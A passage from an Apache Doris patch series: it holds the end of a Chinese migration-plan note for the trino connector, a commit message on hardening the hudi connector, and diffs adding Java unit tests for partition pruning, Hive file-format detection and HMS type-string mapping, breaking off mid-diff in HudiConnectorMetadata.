T10 目录删除一起清) + - `PhysicalPlanTranslator.java:779`:`instanceof TrinoConnectorExternalTable` → `new TrinoConnectorScanNode(...)`(T08 删) + - `GsonUtils.java:402 / 457 / 476`:3 个 class-token subtype 注册(T10 删,T03 用 string-name redirect 替代承接 image compat) +- **反向 instanceof**:实际只 1 处(PhysicalPlanTranslator:779),dashboard "0/2" 为过时数字。`TrinoConnectorScanNode.java:232` 内部对 split 类型的 instanceof **不算**(连接器内部自洽)。 +- **fe-connector-trino 完成度**:13 个 class / 2162 LOC / **0 测试**。SPI 表面 ~95% IMPL/DEFAULT;真缺:`validateProperties`、`preCreateValidation`、pushdown ops 三处。pom.xml 干净(无 `fe-core` 依赖泄漏);`plugin-zip.xml` assembly 已就位。 +- **SPI_READY 翻闸点**:`CatalogFactory.java:53` `SPI_READY_TYPES = ImmutableSet.of("jdbc", "es")`,consume 模式 line 106 → SPI;fallback switch line 135 处理非 SPI。 +- **Gson 兼容**:`GsonUtils.java:411,414` 已有 ES/JDBC 的 string-name redirect 范式,trino 复用即可;`PluginDrivenExternalCatalog.gsonPostProcess` lines 318-341 已有 ES/JDBC 的 logType 迁移分支。 +- **import gate**:`fe-connector-trino` 反向 import `fe-core` **0 次**,干净。 + +**用户决议**(2026-05-25 晚 session): +- **Q1**:pushdown ops 纳入 P2 批 A(不推迟)。理由:避免 trino 走 SPI 后查询性能暂时退步 +- **Q2**:fe-core 旧目录删除时,`GsonUtils:402/457/476` 三个 class-token 注册同步删除(不留 stub 类);image compat 全部由 T03 的 string-name redirect 承接。和 ES/JDBC 一致 + +task 划分敲定为 13 tasks / 5 批次(A=SPI 补齐 / B=fe-core 桥接 / C=翻闸 / D=清旧 / E=测试+文档)。 + +下一步:启动批 A T01-T02 编码。 + +--- + +## 关联 + +- Master plan 章节:[§3.3 P2 阶段](../00-connector-migration-master-plan.md) +- RFC 章节:n/a(P2 是 P0 SPI baseline 的首次完整消费方实施;不修改 SPI 设计) +- 决策:D-002(scan-node 复用 FileQueryScanNode) +- 偏差:— +- 风险:R-001(image 反序列化兼容回归——T03/T10 是直接相关 surface)、R-004(classloader 隔离——Trino plugin loader 在 fe-connector-trino 内部,需要单测验证) +- 连接器:[trino-connector](../connectors/trino-connector.md) + +--- + +## 当前阻塞项 + +无。recon 完成 + task 划分敲定,可立即启动批 A。 From bfff78d3ab05c5a29971bfa63ab5d8a72d6e2c00 Mon Sep 17 00:00:00 2001 From: "Mingyu Chen (Rayner)" Date: Sat, 6 Jun 2026 10:34:04 +0800 Subject: [PATCH 005/128] [feat](connector) P3 hudi connector hardening + test baseline + dispatch design (hybrid, T02-T08) (#64143) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit ## Proposed changes testing with #64146 P3 of the catalog-SPI migration (base: `branch-catalog-spi`). Migrates the **hudi** connector following the **hybrid** strategy (D-019): harden the dormant HMS-over-SPI hudi connector to correctness parity, build a test baseline, and write the per-table dispatch design — **all behind the closed gate** (`SPI_READY_TYPES` unchanged). > ⚠️ **No user-visible behavior change.** The SPI hudi path stays dormant (gate closed); hudi queries continue to use the legacy `HMSExternalTable.dlaType=HUDI` path. This PR removes correctness blockers ahead of the live cutover (deferred to P7 / batch E). ### What's included **Correctness fixes (hardening dormant code, behind gate):** - **T02** — fix hudi JNI `column_types` double bug: emit full Hive type strings (was Doris bare type names, losing precision/scale/subtypes) and send `column_names`/`column_types`/`delta_logs` as typed lists end-to-end (was comma join/split, which shattered `decimal(10,2)` / `struct<...>`). Matches the BE `hudi_jni_reader.cpp` contract (names `,` / types `#` / delta `,`). - **T04** — fail loud on time-travel / incremental read in the SPI `visitPhysicalHudiScan` branch (was silently returning the latest snapshot / silently full-scanning). - **T05** — real EQ/IN partition pruning in `HudiConnectorMetadata.applyFilter` (was a placeholder that ignored predicates and unconditionally switched the partition source from Hudi-metadata to HMS); faithfully mirrors `HiveConnectorMetadata.applyFilter`. - **T07** — column-name casing fix in `avroSchemaToColumns` (top-level lowercase, mirroring legacy `HMSExternalTable`). **Test baseline (all three connector modules started P3 with 0 tests):** - `fe-connector-hudi` (33): type-mapping / schema-parity (COW/MOR golden) / table-type / partition-pruning / scan-range. - `fe-connector-hms` (12): shared Hive-type-string parser tests. - `fe-connector-hive` (14): file-format / partition-pruning (mirrors T05). - COW/MOR schema is **type-agnostic** (golden parity vs legacy `initHudiSchema`); table type only affects scan planning. **Decisions / design (code-grounded, design-only):** - **T03** — defer `schema_id`/`history_schema_info` field-id evolution to batch E (DV-006; not a model-agnostic SPI fix). - **T06** — keep MVCC/snapshot SPI defaults (opt-out) + document (DV-007). - **T08** — `tableFormatType` dispatch design memo + **D-020**: single `hms` catalog per-table routing via a new backward-compatible `ConnectorMetadata.getScanPlanProvider(handle)` (per-table provider seam); refines D-005. The keystone gap is split into M1 (identity consumption, fe-core reads `tableFormatType` as an opaque string) and M2 (scan routing). ### Deferred to batch E / P7 (not in this PR) Gate flip (`SPI_READY_TYPES += hms/hudi`), fe-core `tableFormatType` consumption (M1+M2 implementation), live cutover, delete legacy `datasource/hudi/`, full incremental/time-travel/MVCC, Iceberg-on-hms via SPI (needs P6 `IcebergScanPlanProvider`), cluster/runtime validation. ### Verification Per task tracking, each code batch landed with: per-module compile + checkstyle 0 (incl. test sources) + connector import-gate pass + new unit tests green. The two most recent commits are docs-only (`plan-doc/`); the code is unchanged since the last green batch. Gate stays closed → the dormant SPI path is unreachable at runtime → zero live-path risk. CI re-verifies. 🤖 Generated with [Claude Code](https://claude.com/claude-code) --- ...ConnectorMetadataPartitionPruningTest.java | 256 +++++++++++++ .../connector/hive/HiveFileFormatTest.java | 97 +++++ .../connector/hms/HmsTypeMappingTest.java | 162 ++++++++ .../connector/hudi/HudiConnectorMetadata.java | 162 +++++++- .../connector/hudi/HudiScanPlanProvider.java | 13 +- .../doris/connector/hudi/HudiScanRange.java | 54 +-- .../doris/connector/hudi/HudiTypeMapping.java | 93 +++++ .../hudi/HudiPartitionPruningTest.java | 265 +++++++++++++ .../connector/hudi/HudiScanRangeTest.java | 95 +++++ .../connector/hudi/HudiSchemaParityTest.java | 135 +++++++ .../connector/hudi/HudiTableTypeTest.java | 148 ++++++++ .../connector/hudi/HudiTypeMappingTest.java | 220 +++++++++++ fe/fe-core/pom.xml | 69 +++- .../translator/PhysicalPlanTranslator.java | 19 +- fe/pom.xml | 5 + plan-doc/HANDOFF.md | 169 ++++----- plan-doc/PROGRESS.md | 46 ++- plan-doc/connectors/hudi.md | 31 +- plan-doc/decisions-log.md | 26 ++ plan-doc/deviations-log.md | 108 +++++- .../spi-multi-format-hms-catalog-analysis.md | 349 ++++++++++++++++++ plan-doc/tasks/P3-hudi-migration.md | 147 ++++++++ .../designs/P3-T02-column-types-design.md | 131 +++++++ .../tasks/designs/P3-T04-fail-loud-design.md | 69 ++++ .../P3-T05-partition-pruning-design.md | 132 +++++++ plan-doc/tasks/designs/P3-T06-mvcc-design.md | 39 ++ .../designs/P3-T07-test-baseline-design.md | 116 ++++++ .../P3-T08-tableformat-dispatch-design.md | 137 +++++++ 28 files changed, 3137 insertions(+), 156 deletions(-) create mode 100644 fe/fe-connector/fe-connector-hive/src/test/java/org/apache/doris/connector/hive/HiveConnectorMetadataPartitionPruningTest.java create mode 100644 fe/fe-connector/fe-connector-hive/src/test/java/org/apache/doris/connector/hive/HiveFileFormatTest.java create mode 100644 fe/fe-connector/fe-connector-hms/src/test/java/org/apache/doris/connector/hms/HmsTypeMappingTest.java create mode 100644 fe/fe-connector/fe-connector-hudi/src/test/java/org/apache/doris/connector/hudi/HudiPartitionPruningTest.java create mode 100644 fe/fe-connector/fe-connector-hudi/src/test/java/org/apache/doris/connector/hudi/HudiScanRangeTest.java create mode 100644 fe/fe-connector/fe-connector-hudi/src/test/java/org/apache/doris/connector/hudi/HudiSchemaParityTest.java create mode 100644 fe/fe-connector/fe-connector-hudi/src/test/java/org/apache/doris/connector/hudi/HudiTableTypeTest.java create mode 100644 fe/fe-connector/fe-connector-hudi/src/test/java/org/apache/doris/connector/hudi/HudiTypeMappingTest.java create mode 100644 plan-doc/research/spi-multi-format-hms-catalog-analysis.md create mode 100644 plan-doc/tasks/P3-hudi-migration.md create mode 100644 plan-doc/tasks/designs/P3-T02-column-types-design.md create mode 100644 plan-doc/tasks/designs/P3-T04-fail-loud-design.md create mode 100644 plan-doc/tasks/designs/P3-T05-partition-pruning-design.md create mode 100644 plan-doc/tasks/designs/P3-T06-mvcc-design.md create mode 100644 plan-doc/tasks/designs/P3-T07-test-baseline-design.md create mode 100644 plan-doc/tasks/designs/P3-T08-tableformat-dispatch-design.md diff --git a/fe/fe-connector/fe-connector-hive/src/test/java/org/apache/doris/connector/hive/HiveConnectorMetadataPartitionPruningTest.java b/fe/fe-connector/fe-connector-hive/src/test/java/org/apache/doris/connector/hive/HiveConnectorMetadataPartitionPruningTest.java new file mode 100644 index 00000000000000..51380bcf58e89b --- /dev/null +++ b/fe/fe-connector/fe-connector-hive/src/test/java/org/apache/doris/connector/hive/HiveConnectorMetadataPartitionPruningTest.java @@ -0,0 +1,256 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.hive; + +import org.apache.doris.connector.api.ConnectorType; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.api.pushdown.ConnectorAnd; +import org.apache.doris.connector.api.pushdown.ConnectorColumnRef; +import org.apache.doris.connector.api.pushdown.ConnectorComparison; +import org.apache.doris.connector.api.pushdown.ConnectorExpression; +import org.apache.doris.connector.api.pushdown.ConnectorFilterConstraint; +import org.apache.doris.connector.api.pushdown.ConnectorIn; +import org.apache.doris.connector.api.pushdown.ConnectorLiteral; +import org.apache.doris.connector.api.pushdown.FilterApplicationResult; +import org.apache.doris.connector.hms.HmsClient; +import org.apache.doris.connector.hms.HmsDatabaseInfo; +import org.apache.doris.connector.hms.HmsPartitionInfo; +import org.apache.doris.connector.hms.HmsTableInfo; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.ArrayList; +import java.util.Arrays; +import java.util.Collections; +import java.util.List; +import java.util.Map; +import java.util.Optional; + +/** + * Tests {@link HiveConnectorMetadata#applyFilter} partition pruning (P3-T07 batch C). + * + *

WHY: this is the direct analog of fe-connector-hudi's HudiPartitionPruningTest — + * both exercise the same EQ/IN partition-pruning helpers (the Hudi T05 fix was mirrored + * from this Hive code). The tests are intentionally near-identical; they differ only in + * the handle type and that Hive resolves matched partition NAMES to + * {@link HmsPartitionInfo} via {@code getPartitions} (capped at 100000), whereas Hudi + * keeps the matched relative paths. Consolidating the two is deferred to the P7 Hive + * migration. These assertions pin: EQ / IN on partition columns prune; predicates on + * non-partition columns never prune; a no-effect predicate leaves the handle untouched + * ({@code Optional.empty()}); a zero-match predicate yields an empty pruned set.

+ */ +public class HiveConnectorMetadataPartitionPruningTest { + + private static final List PARTITIONS = Arrays.asList( + "year=2023/month=12", + "year=2024/month=01", + "year=2024/month=02"); + + private static final List PART_KEYS = Arrays.asList("year", "month"); + + @Test + public void testEqOnPartitionColumnPrunes() { + Optional> result = + applyFilter(partitionedHandle(), eq("year", "2024")); + Assertions.assertTrue(result.isPresent()); + Assertions.assertEquals( + Arrays.asList("year=2024/month=01", "year=2024/month=02"), + prunedLocations(result)); + } + + @Test + public void testInOnPartitionColumnPrunes() { + Optional> result = + applyFilter(partitionedHandle(), in("month", "01", "12")); + Assertions.assertTrue(result.isPresent()); + Assertions.assertEquals( + Arrays.asList("year=2023/month=12", "year=2024/month=01"), + prunedLocations(result)); + } + + @Test + public void testAndOfTwoPartitionColumnsPrunes() { + Optional> result = + applyFilter(partitionedHandle(), and(eq("year", "2024"), eq("month", "01"))); + Assertions.assertTrue(result.isPresent()); + Assertions.assertEquals( + Collections.singletonList("year=2024/month=01"), + prunedLocations(result)); + } + + @Test + public void testNonPartitionColumnInAndIsIgnored() { + Optional> result = + applyFilter(partitionedHandle(), and(eq("year", "2024"), eq("price", "100"))); + Assertions.assertTrue(result.isPresent()); + Assertions.assertEquals( + Arrays.asList("year=2024/month=01", "year=2024/month=02"), + prunedLocations(result)); + } + + @Test + public void testNonPartitionPredicateOnlyLeavesHandleUntouched() { + Optional> result = + applyFilter(partitionedHandle(), eq("price", "100")); + Assertions.assertFalse(result.isPresent()); + } + + @Test + public void testPredicateMatchingAllPartitionsHasNoEffect() { + Optional> result = + applyFilter(partitionedHandle(), in("year", "2023", "2024")); + Assertions.assertFalse(result.isPresent()); + } + + @Test + public void testPredicateMatchingNoPartitionYieldsEmptyPrunedList() { + Optional> result = + applyFilter(partitionedHandle(), eq("year", "1999")); + Assertions.assertTrue(result.isPresent()); + Assertions.assertTrue(prunedLocations(result).isEmpty()); + } + + @Test + public void testUnpartitionedTableIsNotTouched() { + HiveTableHandle handle = new HiveTableHandle.Builder("db", "t", HiveTableType.HIVE) + .partitionKeyNames(Collections.emptyList()) + .build(); + Optional> result = + applyFilter(handle, eq("year", "2024")); + Assertions.assertFalse(result.isPresent()); + } + + // ===== helpers ===== + + private Optional> applyFilter( + HiveTableHandle handle, ConnectorExpression expr) { + HiveConnectorMetadata metadata = new HiveConnectorMetadata( + new FakeHmsClient(PARTITIONS), Collections.emptyMap()); + return metadata.applyFilter(null, handle, new ConnectorFilterConstraint(expr)); + } + + private HiveTableHandle partitionedHandle() { + return new HiveTableHandle.Builder("db", "t", HiveTableType.HIVE) + .partitionKeyNames(PART_KEYS) + .build(); + } + + private List prunedLocations(Optional> result) { + List pruned = + ((HiveTableHandle) result.get().getHandle()).getPrunedPartitions(); + List locations = new ArrayList<>(); + for (HmsPartitionInfo p : pruned) { + locations.add(p.getLocation()); + } + return locations; + } + + private static ConnectorColumnRef colRef(String name) { + return new ConnectorColumnRef(name, ConnectorType.of("STRING")); + } + + private static ConnectorLiteral lit(String value) { + return new ConnectorLiteral(ConnectorType.of("STRING"), value); + } + + private static ConnectorComparison eq(String col, String value) { + return new ConnectorComparison(ConnectorComparison.Operator.EQ, colRef(col), lit(value)); + } + + private static ConnectorIn in(String col, String... values) { + List inList = new ArrayList<>(); + for (String v : values) { + inList.add(lit(v)); + } + return new ConnectorIn(colRef(col), inList, false); + } + + private static ConnectorAnd and(ConnectorExpression... children) { + return new ConnectorAnd(Arrays.asList(children)); + } + + /** + * Minimal {@link HmsClient} double. {@code listPartitionNames} returns a fixed list; + * {@code getPartitions} echoes each requested name back as an {@link HmsPartitionInfo} + * whose location IS the partition name (so the pruning selection can be asserted). + * The rest fail loud. + */ + private static final class FakeHmsClient implements HmsClient { + private final List partitionNames; + + FakeHmsClient(List partitionNames) { + this.partitionNames = partitionNames; + } + + @Override + public List listPartitionNames(String dbName, String tableName, int maxParts) { + return partitionNames; + } + + @Override + public List getPartitions(String dbName, String tableName, + List partNames) { + List result = new ArrayList<>(); + for (String name : partNames) { + result.add(new HmsPartitionInfo(Collections.emptyList(), name, + null, null, null, Collections.emptyMap())); + } + return result; + } + + @Override + public List listDatabases() { + throw new UnsupportedOperationException(); + } + + @Override + public HmsDatabaseInfo getDatabase(String dbName) { + throw new UnsupportedOperationException(); + } + + @Override + public List listTables(String dbName) { + throw new UnsupportedOperationException(); + } + + @Override + public boolean tableExists(String dbName, String tableName) { + throw new UnsupportedOperationException(); + } + + @Override + public HmsTableInfo getTable(String dbName, String tableName) { + throw new UnsupportedOperationException(); + } + + @Override + public Map getDefaultColumnValues(String dbName, String tableName) { + throw new UnsupportedOperationException(); + } + + @Override + public HmsPartitionInfo getPartition(String dbName, String tableName, List values) { + throw new UnsupportedOperationException(); + } + + @Override + public void close() { + } + } +} diff --git a/fe/fe-connector/fe-connector-hive/src/test/java/org/apache/doris/connector/hive/HiveFileFormatTest.java b/fe/fe-connector/fe-connector-hive/src/test/java/org/apache/doris/connector/hive/HiveFileFormatTest.java new file mode 100644 index 00000000000000..d4cfe275cf48a6 --- /dev/null +++ b/fe/fe-connector/fe-connector-hive/src/test/java/org/apache/doris/connector/hive/HiveFileFormatTest.java @@ -0,0 +1,97 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.hive; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +/** + * Tests {@link HiveFileFormat} detection (first test for fe-connector-hive; P3-T07 batch C). + * + *

WHY: the detected format selects which BE file reader runs (parquet/orc/text/json + * scanner). Misdetection causes read failures or silent corruption. Detection is a + * case-insensitive substring match on the InputFormat class name with a SerDe-library + * fallback — these tests pin that contract, the inputFormat-wins precedence, and the + * splittability of each format.

+ */ +public class HiveFileFormatTest { + + @Test + public void testFromInputFormatDetectsByContent() { + Assertions.assertEquals(HiveFileFormat.PARQUET, + HiveFileFormat.fromInputFormat("org.apache.hadoop.hive.ql.io.parquet.MapredParquetInputFormat")); + Assertions.assertEquals(HiveFileFormat.ORC, + HiveFileFormat.fromInputFormat("org.apache.hadoop.hive.ql.io.orc.OrcInputFormat")); + Assertions.assertEquals(HiveFileFormat.TEXT, + HiveFileFormat.fromInputFormat("org.apache.hadoop.mapred.TextInputFormat")); + Assertions.assertEquals(HiveFileFormat.JSON, + HiveFileFormat.fromInputFormat("org.apache.hadoop.hive.json.JsonInputFormat")); + } + + @Test + public void testFromInputFormatUnknownAndNull() { + Assertions.assertEquals(HiveFileFormat.UNKNOWN, HiveFileFormat.fromInputFormat(null)); + Assertions.assertEquals(HiveFileFormat.UNKNOWN, + HiveFileFormat.fromInputFormat("com.example.CustomInputFormat")); + } + + @Test + public void testFromSerDeLib() { + Assertions.assertEquals(HiveFileFormat.PARQUET, + HiveFileFormat.fromSerDeLib("org.apache.hadoop.hive.ql.io.parquet.serde.ParquetHiveSerDe")); + Assertions.assertEquals(HiveFileFormat.ORC, + HiveFileFormat.fromSerDeLib("org.apache.hadoop.hive.ql.io.orc.OrcSerde")); + Assertions.assertEquals(HiveFileFormat.TEXT, + HiveFileFormat.fromSerDeLib("org.apache.hadoop.hive.serde2.lazy.LazySimpleSerDe")); + Assertions.assertEquals(HiveFileFormat.TEXT, + HiveFileFormat.fromSerDeLib("org.apache.hadoop.hive.serde2.OpenCSVSerde")); + Assertions.assertEquals(HiveFileFormat.JSON, + HiveFileFormat.fromSerDeLib("org.apache.hive.hcatalog.data.JsonSerDe")); + Assertions.assertEquals(HiveFileFormat.UNKNOWN, HiveFileFormat.fromSerDeLib(null)); + } + + @Test + public void testDetectPrefersInputFormatThenFallsBackToSerDe() { + // inputFormat wins when recognized (even if the SerDe says otherwise)... + Assertions.assertEquals(HiveFileFormat.PARQUET, + HiveFileFormat.detect( + "org.apache.hadoop.hive.ql.io.parquet.MapredParquetInputFormat", + "org.apache.hadoop.hive.ql.io.orc.OrcSerde")); + // ...and the SerDe is the fallback when the inputFormat is unrecognized. + Assertions.assertEquals(HiveFileFormat.TEXT, + HiveFileFormat.detect("com.example.CustomInputFormat", + "org.apache.hadoop.hive.serde2.OpenCSVSerde")); + } + + @Test + public void testIsSplittable() { + Assertions.assertTrue(HiveFileFormat.PARQUET.isSplittable()); + Assertions.assertTrue(HiveFileFormat.ORC.isSplittable()); + Assertions.assertTrue(HiveFileFormat.TEXT.isSplittable()); + Assertions.assertFalse(HiveFileFormat.JSON.isSplittable()); + Assertions.assertFalse(HiveFileFormat.UNKNOWN.isSplittable()); + } + + @Test + public void testFormatName() { + Assertions.assertEquals("parquet", HiveFileFormat.PARQUET.getFormatName()); + Assertions.assertEquals("orc", HiveFileFormat.ORC.getFormatName()); + Assertions.assertEquals("text", HiveFileFormat.TEXT.getFormatName()); + Assertions.assertEquals("json", HiveFileFormat.JSON.getFormatName()); + } +} diff --git a/fe/fe-connector/fe-connector-hms/src/test/java/org/apache/doris/connector/hms/HmsTypeMappingTest.java b/fe/fe-connector/fe-connector-hms/src/test/java/org/apache/doris/connector/hms/HmsTypeMappingTest.java new file mode 100644 index 00000000000000..4c63afae1f8925 --- /dev/null +++ b/fe/fe-connector/fe-connector-hms/src/test/java/org/apache/doris/connector/hms/HmsTypeMappingTest.java @@ -0,0 +1,162 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.hms; + +import org.apache.doris.connector.api.ConnectorType; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Arrays; + +/** + * Tests {@link HmsTypeMapping} — the Hive type-string parser shared by the hms and hive + * connectors (first test for fe-connector-hms; P3-T07 batch C baseline). + * + *

WHY: this is the SPI-clean equivalent of fe-core + * {@code HiveMetaStoreClientHelper.hiveTypeToDorisType}. It is pure parsing logic where + * bugs hide — nested complex types, precision/scale extraction, and option-driven + * mappings. A wrong mapping silently mistypes every column of an HMS/Hive/Iceberg-on-HMS + * table. These tests pin the exact ConnectorType per Hive type string and the + * nesting-aware field splitting (Rule 9: encode the contract, not just the happy path).

+ */ +public class HmsTypeMappingTest { + + private static ConnectorType map(String hiveType) { + return HmsTypeMapping.toConnectorType(hiveType); + } + + @Test + public void testPrimitives() { + Assertions.assertEquals(ConnectorType.of("BOOLEAN"), map("boolean")); + Assertions.assertEquals(ConnectorType.of("TINYINT"), map("tinyint")); + Assertions.assertEquals(ConnectorType.of("SMALLINT"), map("smallint")); + Assertions.assertEquals(ConnectorType.of("INT"), map("int")); + Assertions.assertEquals(ConnectorType.of("BIGINT"), map("bigint")); + Assertions.assertEquals(ConnectorType.of("FLOAT"), map("float")); + Assertions.assertEquals(ConnectorType.of("DOUBLE"), map("double")); + Assertions.assertEquals(ConnectorType.of("STRING"), map("string")); + Assertions.assertEquals(ConnectorType.of("DATEV2"), map("date")); + } + + @Test + public void testTimestampUsesTimeScale() { + // Default time scale is 6. + Assertions.assertEquals(ConnectorType.of("DATETIMEV2", 6, -1), map("timestamp")); + // A custom time scale flows through. + Assertions.assertEquals(ConnectorType.of("DATETIMEV2", 3, -1), + HmsTypeMapping.toConnectorType("timestamp", new HmsTypeMapping.Options(3, false, false))); + } + + @Test + public void testBinaryDefaultAndVarbinaryOption() { + Assertions.assertEquals(ConnectorType.of("STRING"), map("binary")); + Assertions.assertEquals(ConnectorType.of("VARBINARY"), + HmsTypeMapping.toConnectorType("binary", new HmsTypeMapping.Options(6, true, false))); + } + + @Test + public void testCharAndVarcharLength() { + Assertions.assertEquals(ConnectorType.of("CHAR", 10, -1), map("char(10)")); + Assertions.assertEquals(ConnectorType.of("VARCHAR", 255, -1), map("varchar(255)")); + // Missing length parameter degrades to the unparameterized type, not a crash. + Assertions.assertEquals(ConnectorType.of("CHAR"), map("char")); + Assertions.assertEquals(ConnectorType.of("VARCHAR"), map("varchar")); + } + + @Test + public void testDecimalPrecisionScaleAndDefaults() { + Assertions.assertEquals(ConnectorType.of("DECIMALV3", 10, 2), map("decimal(10,2)")); + // Only precision given -> default scale 0. + Assertions.assertEquals(ConnectorType.of("DECIMALV3", 10, 0), map("decimal(10)")); + // Bare decimal -> default precision 9, scale 0. + Assertions.assertEquals(ConnectorType.of("DECIMALV3", 9, 0), map("decimal")); + } + + @Test + public void testArrayIncludingNested() { + Assertions.assertEquals(ConnectorType.arrayOf(ConnectorType.of("INT")), map("array")); + Assertions.assertEquals( + ConnectorType.arrayOf(ConnectorType.arrayOf(ConnectorType.of("STRING"))), + map("array>")); + } + + @Test + public void testMapIncludingNestedValue() { + Assertions.assertEquals( + ConnectorType.mapOf(ConnectorType.of("STRING"), ConnectorType.of("INT")), + map("map")); + // The inner comma of the nested array value must NOT be mistaken for the key/value + // separator — this is exactly what findNextNestedField guards. + Assertions.assertEquals( + ConnectorType.mapOf(ConnectorType.of("INT"), + ConnectorType.arrayOf(ConnectorType.of("STRING"))), + map("map>")); + } + + @Test + public void testStructIncludingNestedFields() { + Assertions.assertEquals( + ConnectorType.structOf(Arrays.asList("a", "b"), + Arrays.asList(ConnectorType.of("INT"), ConnectorType.of("STRING"))), + map("struct")); + Assertions.assertEquals( + ConnectorType.structOf(Arrays.asList("x", "y"), + Arrays.asList(ConnectorType.arrayOf(ConnectorType.of("INT")), + ConnectorType.mapOf(ConnectorType.of("STRING"), ConnectorType.of("BIGINT")))), + map("struct,y:map>")); + } + + @Test + public void testTimestampWithLocalTimeZone() { + // Default: mapped to DATETIMEV2. + Assertions.assertEquals(ConnectorType.of("DATETIMEV2", 6, -1), + map("timestamp with local time zone")); + // With the timestamp-tz option: mapped to TIMESTAMPTZ. + Assertions.assertEquals(ConnectorType.of("TIMESTAMPTZ", 6, -1), + HmsTypeMapping.toConnectorType("timestamp with local time zone", + new HmsTypeMapping.Options(6, false, true))); + } + + @Test + public void testUnsupportedTypeIsUnsupportedNotCrash() { + Assertions.assertEquals(ConnectorType.of("UNSUPPORTED"), map("interval_day_time")); + Assertions.assertEquals(ConnectorType.of("UNSUPPORTED"), map("void")); + } + + @Test + public void testCaseInsensitiveAndLowercasesNestedNames() { + Assertions.assertEquals(ConnectorType.of("INT"), map("INT")); + Assertions.assertEquals(ConnectorType.arrayOf(ConnectorType.of("STRING")), map("ARRAY")); + // The whole type string is lowercased first, so struct field names are lowercased too. + Assertions.assertEquals( + ConnectorType.structOf(Arrays.asList("name"), Arrays.asList(ConnectorType.of("INT"))), + map("STRUCT")); + } + + @Test + public void testFindNextNestedFieldRespectsNesting() { + // Top-level comma found at the right index... + Assertions.assertEquals(3, HmsTypeMapping.findNextNestedField("int,string")); + Assertions.assertEquals(10, HmsTypeMapping.findNextNestedField("array,string")); + // ...and a comma nested inside <> is skipped (returns the next top-level comma). + Assertions.assertEquals(15, HmsTypeMapping.findNextNestedField("map,extra")); + // No top-level comma -> returns the length. + Assertions.assertEquals(3, HmsTypeMapping.findNextNestedField("int")); + } +} diff --git a/fe/fe-connector/fe-connector-hudi/src/main/java/org/apache/doris/connector/hudi/HudiConnectorMetadata.java b/fe/fe-connector/fe-connector-hudi/src/main/java/org/apache/doris/connector/hudi/HudiConnectorMetadata.java index 7b4fe4b0b791e5..3e43b25230fbb3 100644 --- a/fe/fe-connector/fe-connector-hudi/src/main/java/org/apache/doris/connector/hudi/HudiConnectorMetadata.java +++ b/fe/fe-connector/fe-connector-hudi/src/main/java/org/apache/doris/connector/hudi/HudiConnectorMetadata.java @@ -24,7 +24,12 @@ import org.apache.doris.connector.api.ConnectorType; import org.apache.doris.connector.api.handle.ConnectorColumnHandle; import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.api.pushdown.ConnectorAnd; +import org.apache.doris.connector.api.pushdown.ConnectorComparison; +import org.apache.doris.connector.api.pushdown.ConnectorExpression; import org.apache.doris.connector.api.pushdown.ConnectorFilterConstraint; +import org.apache.doris.connector.api.pushdown.ConnectorIn; +import org.apache.doris.connector.api.pushdown.ConnectorLiteral; import org.apache.doris.connector.api.pushdown.FilterApplicationResult; import org.apache.doris.connector.hms.HmsClient; import org.apache.doris.connector.hms.HmsClientException; @@ -39,10 +44,13 @@ import java.util.ArrayList; import java.util.Collections; +import java.util.HashMap; import java.util.LinkedHashMap; import java.util.List; +import java.util.Locale; import java.util.Map; import java.util.Optional; +import java.util.Set; import java.util.stream.Collectors; /** @@ -150,17 +158,38 @@ public Optional> applyFilter( return Optional.empty(); } - // List all partition names from HMS (e.g. "year=2024/month=01") - // These are relative paths that double as partition identifiers - List partitionNames = hmsClient.listPartitionNames( + // Extract equality/IN predicates on partition columns from the expression. + // No partition predicate -> leave the handle untouched so resolvePartitions + // falls back to Hudi's own metadata listing (HoodieTableMetadata.getAllPartitionPaths). + Map> partitionPredicates = extractPartitionPredicates( + constraint.getExpression(), partKeyNames); + if (partitionPredicates.isEmpty()) { + return Optional.empty(); + } + + // List candidate partition names from HMS (e.g. "year=2024/month=01"). These + // relative paths double as partition identifiers consumed by HudiScanPlanProvider. + // Keep maxParts=-1 (unlimited): no silent partition truncation. + List allPartNames = hmsClient.listPartitionNames( hudiHandle.getDbName(), hudiHandle.getTableName(), -1); - if (partitionNames == null || partitionNames.isEmpty()) { + if (allPartNames == null || allPartNames.isEmpty()) { + return Optional.empty(); + } + + List matchedPartNames = prunePartitionNames( + allPartNames, partKeyNames, partitionPredicates); + if (matchedPartNames.size() == allPartNames.size()) { + // No pruning effect return Optional.empty(); } - // Build updated handle with partition paths for scan planning + LOG.info("Partition pruning: {}.{} all={} 